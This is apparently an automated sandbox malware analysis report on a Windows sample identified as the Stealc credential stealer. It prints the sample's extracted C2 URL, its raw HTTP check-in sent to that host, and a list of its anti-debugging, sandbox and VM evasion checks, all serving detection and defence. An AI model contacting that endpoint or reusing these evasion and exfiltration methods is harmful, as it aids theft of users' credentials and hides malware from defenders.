Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532364
MD5:fb664593a62eba5ceb677e19aedc1673
SHA1:aee5527070492aa7d1e7c93a3a806ba0ef8fab8c
SHA256:0d7cf91d5f474164b23946086b63538ccb1e4bf612e45e9556b2021574b26731
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FB664593A62EBA5CEB677E19AEDC1673)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7260JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7260JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.680000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T02:44:05.656962+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.680000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpLVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php8Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpxVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php$Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpPVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 54%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0068C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00687240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00687240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00689AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00689B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00698EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00698EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00694570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0068ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0068BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00693EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068F6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 41 46 34 31 37 35 44 39 42 36 31 37 30 39 33 34 31 30 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="hwid"6FAF4175D9B61709341086------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="build"doma------DAFIEHIEGDHIDGDGHDHJ--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00684880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00684880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 41 46 34 31 37 35 44 39 42 36 31 37 30 39 33 34 31 30 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="hwid"6FAF4175D9B61709341086------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="build"doma------DAFIEHIEGDHIDGDGHDHJ--
                Source: file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/6122658-3693405117-2476756634-1002e
                Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/Lxcq
                Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/UxZq
                Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/cx
                Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767079494.00000000014EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php$
                Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
                Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpL
                Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpP
                Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpRx
                Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpx
                Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37o

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB0_2_00A4A8BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A408E20_2_00A408E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2F8D40_2_00A2F8D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097B0170_2_0097B017
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A041AC0_2_00A041AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A473D40_2_00A473D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F131E0_2_008F131E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4C35C0_2_00A4C35C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4DCEF0_2_00A4DCEF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00959DF40_2_00959DF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AFE3E0_2_009AFE3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A48E640_2_00A48E64
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2367B0_2_00A2367B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3EF590_2_00A3EF59
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006845C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: miiyolpi ZLIB complexity 0.9950571145672333
                Source: file.exe, 00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00699600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00693720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HT44LF9U.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 54%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1812992 > 1048576
                Source: file.exeStatic PE information: Raw size of miiyolpi is bigger than: 0x100000 < 0x194600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;miiyolpi:EW;gkepzjad:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;miiyolpi:EW;gkepzjad:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c06bb should be: 0x1c66e6
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: miiyolpi
                Source: file.exeStatic PE information: section name: gkepzjad
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B408B7 push ebx; mov dword ptr [esp], ecx0_2_00B4097C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push ebx; mov dword ptr [esp], 3506ED5Dh0_2_00A4A902
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push ebx; mov dword ptr [esp], eax0_2_00A4A95F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push edx; mov dword ptr [esp], eax0_2_00A4A97F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push esi; mov dword ptr [esp], 003CA3FBh0_2_00A4A9FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push edx; mov dword ptr [esp], 7FF74867h0_2_00A4AB45
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push ebx; mov dword ptr [esp], eax0_2_00A4AB54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 21C10E3Ch; mov dword ptr [esp], ebx0_2_00A4AC1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push eax; mov dword ptr [esp], esi0_2_00A4ACCC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 279D721Bh; mov dword ptr [esp], eax0_2_00A4ACE4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push ecx; mov dword ptr [esp], ebp0_2_00A4AD5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push ecx; mov dword ptr [esp], eax0_2_00A4AD85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 4734A2C6h; mov dword ptr [esp], edi0_2_00A4AE22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 4086EB83h; mov dword ptr [esp], ebx0_2_00A4AE56
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push eax; mov dword ptr [esp], ebp0_2_00A4AEB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 14FA2791h; mov dword ptr [esp], ecx0_2_00A4AEBA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push ecx; mov dword ptr [esp], 02D04A04h0_2_00A4AF2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push eax; mov dword ptr [esp], edi0_2_00A4AF72
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push eax; mov dword ptr [esp], esi0_2_00A4AF8B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 6A138685h; mov dword ptr [esp], eax0_2_00A4AFA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push esi; mov dword ptr [esp], 6730ED42h0_2_00A4B01E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push ebx; mov dword ptr [esp], edx0_2_00A4B041
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push eax; mov dword ptr [esp], edi0_2_00A4B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push edi; mov dword ptr [esp], esp0_2_00A4B05D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 08980700h; mov dword ptr [esp], eax0_2_00A4B0B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 7B206CA7h; mov dword ptr [esp], esp0_2_00A4B139
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 1FA9E2D8h; mov dword ptr [esp], ecx0_2_00A4B2A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push eax; mov dword ptr [esp], 5E33C0C0h0_2_00A4B2E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 3830FE77h; mov dword ptr [esp], eax0_2_00A4B314
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push 310DBC74h; mov dword ptr [esp], ecx0_2_00A4B33D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A8BB push ebp; mov dword ptr [esp], eax0_2_00A4B368
                Source: file.exeStatic PE information: section name: miiyolpi entropy: 7.954024820130496

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13575
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55168 second address: A5516E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5516E second address: A55173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48963 second address: A48967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48967 second address: A4896B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
